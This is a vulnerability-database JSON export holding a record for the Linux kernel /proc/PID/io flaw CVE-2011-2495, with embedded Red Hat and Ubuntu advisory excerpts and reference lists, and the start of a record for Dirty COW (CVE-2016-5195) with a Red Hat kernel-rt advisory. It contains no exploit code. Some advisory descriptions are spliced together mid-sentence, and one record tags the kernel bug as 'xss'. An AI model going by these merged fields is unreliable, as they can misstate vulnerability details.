loaded accidentally, which may occur\nif an application that requires SCTP is started. When using a\nfully-virtualized guest on a host that does not use hardware assisted\npaging (HAP), such as those running CPUs that do not have support for (or\nthose that have it disabled) Intel Extended Page Tables (EPT) or AMD\nVirtualization (AMD-V) Rapid Virtualization Indexing (RVI), a privileged\nguest user could trigger this flaw to cause the hypervisor to crash. \n\nThis update also fixes the following bugs:\n\n* On Broadcom PCI cards that use the tg3 driver, the operational state of a\nnetwork device, represented by the value in\n\"/sys/class/net/ethX/operstate\", was not initialized by default. \nConsequently, the state was reported as \"unknown\" when the tg3 network\ndevice was actually in the \"up\" state. This update modifies the tg3 driver\nto properly set the operstate value. (BZ#744699)\n\n* A KVM (Kernel-based Virtual Machine) guest can get preempted by the host,\nwhen a higher priority process needs to run. When a guest is not running\nfor several timer interrupts in a row, ticks could be lost, resulting in\nthe jiffies timer advancing slower than expected and timeouts taking longer\nthan expected. To correct for the issue of lost ticks,\ndo_timer_tsc_timekeeping() checks a reference clock source (kvm-clock when\nrunning as a KVM guest) to see if timer interrupts have been missed. If so,\njiffies is incremented by the number of missed timer interrupts, ensuring\nthat programs are woken up on time. (BZ#747874)\n\n* When a block device object was allocated, the bd_super field was not\nbeing explicitly initialized to NULL. Previously, users of the block device\nobject could set bd_super to NULL when the object was released by calling\nthe kill_block_super() function. Certain third-party file systems do not\nalways use this function, and bd_super could therefore become uninitialized\nwhen the object was allocated again. This could cause a kernel panic in the\nblkdev_releasepage() function, when the uninitialized bd_super field was\ndereferenced. Now, bd_super is properly initialized in the bdget()\nfunction, and the kernel panic no longer occurs. (BZ#751137)\n\n4. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. Unless you\nmanually uninstalled the standard kernel metapackages (e.g. linux-generic,\nlinux-server, linux-powerpc), a standard system upgrade will automatically\nperform this as well. ==========================================================================\nUbuntu Security Notice USN-1244-1\nOctober 25, 2011\n\nlinux-ti-omap4 vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 10.10\n\nSummary:\n\nSeveral security issues were fixed in the kernel. A remote attacker could exploit this to\ncrash the kernel, leading to a denial of service. (CVE-2011-2183)\n\nVasily Averin discovered that the NFS Lock Manager (NLM) incorrectly\nhandled unlock requests. (CVE-2011-2491)\n\nVasiliy Kulikov discovered that taskstats did not enforce access\nrestrictions. A local attacker could exploit this to read certain\ninformation, leading to a loss of privacy. (CVE-2011-2494)\n\nVasiliy Kulikov discovered that /proc/PID/io did not enforce access\nrestrictions. A local attacker could exploit this to read certain\ninformation, leading to a loss of privacy. (CVE-2011-2495)\n\nIt was discovered that the wireless stack incorrectly verified SSID\nlengths. (CVE-2011-2517)\n\nIt was discovered that the EXT4 filesystem contained multiple off-by-one\nflaws. (CVE-2011-2695)\n\nChristian Ohm discovered that the perf command looks for configuration\nfiles in the current directory. If a privileged user were tricked into\nrunning perf in a directory containing a malicious configuration file, an\nattacker could run arbitrary commands and possibly gain privileges. \n(CVE-2011-2905)\n\nVasiliy Kulikov discovered that the Comedi driver did not correctly clear\nmemory. A local attacker could exploit this to read kernel stack memory,\nleading to a loss of privacy. (CVE-2011-2909)\n\nYogesh Sharma discovered that CIFS did not correctly handle UNCs that had\nno prefixpaths. \n(CVE-2011-3363)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 10.10:\n  linux-image-2.6.35-903-omap4    2.6.35-903.26\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2011-2495"
      },
      {
        "db": "BID",
        "id": "51749"
      },
      {
        "db": "PACKETSTORM",
        "id": "109259"
      },
      {
        "db": "PACKETSTORM",
        "id": "107394"
      },
      {
        "db": "PACKETSTORM",
        "id": "104394"
      },
      {
        "db": "PACKETSTORM",
        "id": "107847"
      },
      {
        "db": "PACKETSTORM",
        "id": "107316"
      },
      {
        "db": "PACKETSTORM",
        "id": "106204"
      },
      {
        "db": "PACKETSTORM",
        "id": "106205"
      }
    ],
    "trust": 1.8
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2011-2495",
        "trust": 2.2
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2011/06/27/1",
        "trust": 1.6
      },
      {
        "db": "BID",
        "id": "51749",
        "trust": 0.9
      },
      {
        "db": "SECUNIA",
        "id": "47804",
        "trust": 0.8
      },
      {
        "db": "SECUNIA",
        "id": "46589",
        "trust": 0.6
      },
      {
        "db": "SECUNIA",
        "id": "45897",
        "trust": 0.6
      },
      {
        "db": "SECUNIA",
        "id": "46133",
        "trust": 0.6
      },
      {
        "db": "SECUNIA",
        "id": "46995",
        "trust": 0.6
      },
      {
        "db": "SECUNIA",
        "id": "46539",
        "trust": 0.6
      },
      {
        "db": "SECUNIA",
        "id": "46308",
        "trust": 0.6
      },
      {
        "db": "SECUNIA",
        "id": "45458",
        "trust": 0.6
      },
      {
        "db": "SECUNIA",
        "id": "46598",
        "trust": 0.6
      },
      {
        "db": "SECUNIA",
        "id": "45933",
        "trust": 0.6
      },
      {
        "db": "SECUNIA",
        "id": "46824",
        "trust": 0.6
      },
      {
        "db": "SECUNIA",
        "id": "46982",
        "trust": 0.6
      },
      {
        "db": "SECUNIA",
        "id": "47007",
        "trust": 0.6
      },
      {
        "db": "SECUNIA",
        "id": "45466",
        "trust": 0.6
      },
      {
        "db": "SECUNIA",
        "id": "46590",
        "trust": 0.6
      },
      {
        "db": "SECUNIA",
        "id": "45746",
        "trust": 0.6
      },
      {
        "db": "SECUNIA",
        "id": "46060",
        "trust": 0.6
      },
      {
        "db": "SECUNIA",
        "id": "45994",
        "trust": 0.6
      },
      {
        "db": "SECUNIA",
        "id": "46587",
        "trust": 0.6
      },
      {
        "db": "SECUNIA",
        "id": "46571",
        "trust": 0.6
      },
      {
        "db": "SECUNIA",
        "id": "45810",
        "trust": 0.6
      },
      {
        "db": "SECUNIA",
        "id": "46595",
        "trust": 0.6
      },
      {
        "db": "SECUNIA",
        "id": "46795",
        "trust": 0.6
      },
      {
        "db": "BID",
        "id": "49408",
        "trust": 0.6
      },
      {
        "db": "NSFOCUS",
        "id": "17646",
        "trust": 0.6
      },
      {
        "db": "MLIST",
        "id": "[OSS-SECURITY] 20110627 RE: CVE REQUEST: KERNEL: TASKSTATS/PROCFS IO INFOLEAK",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201108-548",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201201-419",
        "trust": 0.6
      },
      {
        "db": "HITACHI",
        "id": "HS12-005",
        "trust": 0.4
      },
      {
        "db": "PACKETSTORM",
        "id": "109259",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "107394",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "104394",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "107847",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "107316",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "106204",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "106205",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "51749"
      },
      {
        "db": "PACKETSTORM",
        "id": "109259"
      },
      {
        "db": "PACKETSTORM",
        "id": "107394"
      },
      {
        "db": "PACKETSTORM",
        "id": "104394"
      },
      {
        "db": "PACKETSTORM",
        "id": "107847"
      },
      {
        "db": "PACKETSTORM",
        "id": "107316"
      },
      {
        "db": "PACKETSTORM",
        "id": "106204"
      },
      {
        "db": "PACKETSTORM",
        "id": "106205"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201108-548"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201201-419"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-2495"
      }
    ]
  },
  "id": "VAR-201206-0279",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.225
  },
  "last_update_date": "2023-02-11T19:26:09.654000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "linux-3.4.3",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=43386"
      }
    ],
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201108-548"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-264",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2011-2495"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.6,
        "url": "https://github.com/torvalds/linux/commit/1d1221f375c94ef961ba8574ac4f85c8870ddd51"
      },
      {
        "trust": 1.6,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=1d1221f375c94ef961ba8574ac4f85c8870ddd51"
      },
      {
        "trust": 1.6,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=716825"
      },
      {
        "trust": 1.6,
        "url": "http://www.openwall.com/lists/oss-security/2011/06/27/1"
      },
      {
        "trust": 1.6,
        "url": "http://ftp.osuosl.org/pub/linux/kernel/v2.6/changelog-2.6.39.4"
      },
      {
        "trust": 1.0,
        "url": "http://rhn.redhat.com/errata/rhsa-2011-1212.html"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2495"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/45458"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/45466"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/45746"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/45810"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/45897"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/45933"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/45994"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/46060"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/46133"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/46308"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/46539"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/46571"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/46587"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/46589"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/46590"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/46595"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/46598"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/46795"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/46824"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/46982"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/46995"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/47007"
      },
      {
        "trust": 0.6,
        "url": "http://secunia.com/advisories/47804"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/bid/49408"
      },
      {
        "trust": 0.6,
        "url": "http://www.nsfocus.net/vulndb/17646"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/bid/51749"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2517"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2491"
      },
      {
        "trust": 0.4,
        "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs12-005/index.html"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2183"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2909"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2905"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2494"
      },
      {
        "trust": 0.3,
        "url": "http://www.hds.com/products/storage-software/hitachi-device-manager.html"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2695"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/kb/docs/doc-11259"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.2,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-2495.html"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.2,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.2,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-2491.html"
      },
      {
        "trust": 0.2,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-2517.html"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/team/key/#package"
      },
      {
        "trust": 0.2,
        "url": "http://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3363"
      },
      {
        "trust": 0.1,
        "url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=47804"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/company/jobs/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/vulnerability_intelligence/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/secunia_security_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://www.hitachi.co.jp/prod/comp/soft1/security/info/vuls/hs12-005/index.html"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/vulnerability_scanning/personal/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/47804/#comments"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/47804/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/about_secunia_advisories/"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/2.6.38-13.52"
      },
      {
        "trust": 0.1,
        "url": "http://www.ubuntu.com/usn/usn-1285-1"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-1776.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1593"
      },
      {
        "trust": 0.1,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=715555"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1898"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1182"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-2497.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2492"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2497"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-1593.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2689"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-2492.html"
      },
      {
        "trust": 0.1,
        "url": "https://rhn.redhat.com/errata/rhsa-2011-1189.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-2689.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-2213.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1776"
      },
      {
        "trust": 0.1,
        "url": "https://docs.redhat.com/docs/en-us/red_hat_enterprise_linux/6/html/6.1_technical_notes/kernel.html#rhsa-2011-1189"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2213"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-2183.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-1898.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-1576.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-2695.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1576"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-1182.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-2901.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2901"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2482"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-2482.html"
      },
      {
        "trust": 0.1,
        "url": "https://rhn.redhat.com/errata/rhsa-2011-1813.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2519"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2011-2519.html"
      },
      {
        "trust": 0.1,
        "url": "http://www.ubuntu.com/usn/usn-1279-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-lts-backport-natty/2.6.38-13.52~lucid1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3188"
      },
      {
        "trust": 0.1,
        "url": "http://www.ubuntu.com/usn/usn-1243-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/2.6.35-30.61"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1479"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3873"
      },
      {
        "trust": 0.1,
        "url": "http://www.ubuntu.com/usn/usn-1244-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-ti-omap4/2.6.35-903.26"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "51749"
      },
      {
        "db": "PACKETSTORM",
        "id": "109259"
      },
      {
        "db": "PACKETSTORM",
        "id": "107394"
      },
      {
        "db": "PACKETSTORM",
        "id": "104394"
      },
      {
        "db": "PACKETSTORM",
        "id": "107847"
      },
      {
        "db": "PACKETSTORM",
        "id": "107316"
      },
      {
        "db": "PACKETSTORM",
        "id": "106204"
      },
      {
        "db": "PACKETSTORM",
        "id": "106205"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201108-548"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201201-419"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-2495"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "BID",
        "id": "51749"
      },
      {
        "db": "PACKETSTORM",
        "id": "109259"
      },
      {
        "db": "PACKETSTORM",
        "id": "107394"
      },
      {
        "db": "PACKETSTORM",
        "id": "104394"
      },
      {
        "db": "PACKETSTORM",
        "id": "107847"
      },
      {
        "db": "PACKETSTORM",
        "id": "107316"
      },
      {
        "db": "PACKETSTORM",
        "id": "106204"
      },
      {
        "db": "PACKETSTORM",
        "id": "106205"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201108-548"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201201-419"
      },
      {
        "db": "NVD",
        "id": "CVE-2011-2495"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2012-01-31T00:00:00",
        "db": "BID",
        "id": "51749"
      },
      {
        "date": "2012-01-31T06:49:21",
        "db": "PACKETSTORM",
        "id": "109259"
      },
      {
        "date": "2011-11-30T01:00:53",
        "db": "PACKETSTORM",
        "id": "107394"
      },
      {
        "date": "2011-08-24T03:11:18",
        "db": "PACKETSTORM",
        "id": "104394"
      },
      {
        "date": "2011-12-14T02:33:20",
        "db": "PACKETSTORM",
        "id": "107847"
      },
      {
        "date": "2011-11-24T17:17:00",
        "db": "PACKETSTORM",
        "id": "107316"
      },
      {
        "date": "2011-10-25T19:54:45",
        "db": "PACKETSTORM",
        "id": "106204"
      },
      {
        "date": "2011-10-25T19:55:32",
        "db": "PACKETSTORM",
        "id": "106205"
      },
      {
        "date": "1900-01-01T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201108-548"
      },
      {
        "date": "1900-01-01T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201201-419"
      },
      {
        "date": "2012-06-13T10:24:00",
        "db": "NVD",
        "id": "CVE-2011-2495"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2012-01-31T00:00:00",
        "db": "BID",
        "id": "51749"
      },
      {
        "date": "2012-06-14T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201108-548"
      },
      {
        "date": "2012-02-02T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201201-419"
      },
      {
        "date": "2013-12-31T04:08:00",
        "db": "NVD",
        "id": "CVE-2011-2495"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "107394"
      },
      {
        "db": "PACKETSTORM",
        "id": "104394"
      },
      {
        "db": "PACKETSTORM",
        "id": "107316"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201108-548"
      }
    ],
    "trust": 0.9
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux Kernel \u2018 fs/proc/base.c \u2019 Permissions and Access Control Vulnerability",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201108-548"
      }
    ],
    "trust": 0.6
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "xss",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "109259"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201201-419"
      }
    ],
    "trust": 0.7
  }
}

var-201611-0386
Vulnerability from variot

Race condition in mm/gup.c in the Linux kernel 2.x through 4.x before 4.8.3 allows local users to gain privileges by leveraging incorrect handling of a copy-on-write (COW) feature to write to a read-only memory mapping, as exploited in the wild in October 2016, aka "Dirty COW.". Linux kernel is prone to a local privilege-escalation vulnerability. Local attackers may exploit this issue to gain elevated privileges. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

===================================================================== Red Hat Security Advisory

Synopsis: Important: kernel-rt security update Advisory ID: RHSA-2016:2110-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-2110.html Issue date: 2016-10-26 CVE Names: CVE-2016-5195 CVE-2016-7039 =====================================================================

  1. Summary:

An update for kernel-rt is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux Realtime (v. 7) - noarch, x86_64 Red Hat Enterprise Linux for Real Time for NFV (v. 7) - noarch, x86_64

  1. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system. (CVE-2016-5195, Important)

  • Linux kernel built with the 802.1Q/802.1ad VLAN(CONFIG_VLAN_8021Q) OR Virtual eXtensible Local Area Network(CONFIG_VXLAN) with Transparent Ethernet Bridging(TEB) GRO support, is vulnerable to a stack overflow issue. It could occur while receiving large packets via GRO path; As an unlimited recursion could unfold in both VLAN and TEB modules, leading to a stack corruption in the kernel. (CVE-2016-7039, Important)

Red Hat would like to thank Phil Oester for reporting CVE-2016-5195.

  1. Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

  1. Bugs fixed (https://bugzilla.redhat.com/):

1375944 - CVE-2016-7039 kernel: remotely triggerable unbounded recursion in the vlan gro code leading to a kernel crash 1384344 - CVE-2016-5195 kernel: mm: privilege escalation via MAP_PRIVATE COW breakage

  1. Package List:

Red Hat Enterprise Linux for Real Time for NFV (v. 7):

Source: kernel-rt-3.10.0-327.36.3.rt56.238.el7.src.rpm

noarch: kernel-rt-doc-3.10.0-327.36.3.rt56.238.el7.noarch.rpm

x86_64: kernel-rt-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm kernel-rt-debug-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm kernel-rt-debug-debuginfo-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm kernel-rt-debug-devel-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm kernel-rt-debug-kvm-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm kernel-rt-debug-kvm-debuginfo-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm kernel-rt-debuginfo-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm kernel-rt-debuginfo-common-x86_64-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm kernel-rt-devel-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm kernel-rt-kvm-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm kernel-rt-kvm-debuginfo-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm kernel-rt-trace-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm kernel-rt-trace-debuginfo-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm kernel-rt-trace-devel-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm kernel-rt-trace-kvm-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm kernel-rt-trace-kvm-debuginfo-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm

Red Hat Enterprise Linux Realtime (v. 7):

Source: kernel-rt-3.10.0-327.36.3.rt56.238.el7.src.rpm

noarch: kernel-rt-doc-3.10.0-327.36.3.rt56.238.el7.noarch.rpm

x86_64: kernel-rt-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm kernel-rt-debug-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm kernel-rt-debug-debuginfo-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm kernel-rt-debug-devel-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm kernel-rt-debuginfo-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm kernel-rt-debuginfo-common-x86_64-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm kernel-rt-devel-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm kernel-rt-trace-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm kernel-rt-trace-debuginfo-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm kernel-rt-trace-devel-3.10.0-327.36.3.rt56.238.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. References:

https://access.redhat.com/security/cve/CVE-2016-5195 https://access.redhat.com/security/cve/CVE-2016-7039 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/security/vulnerabilities/2706661

  1. Contact:

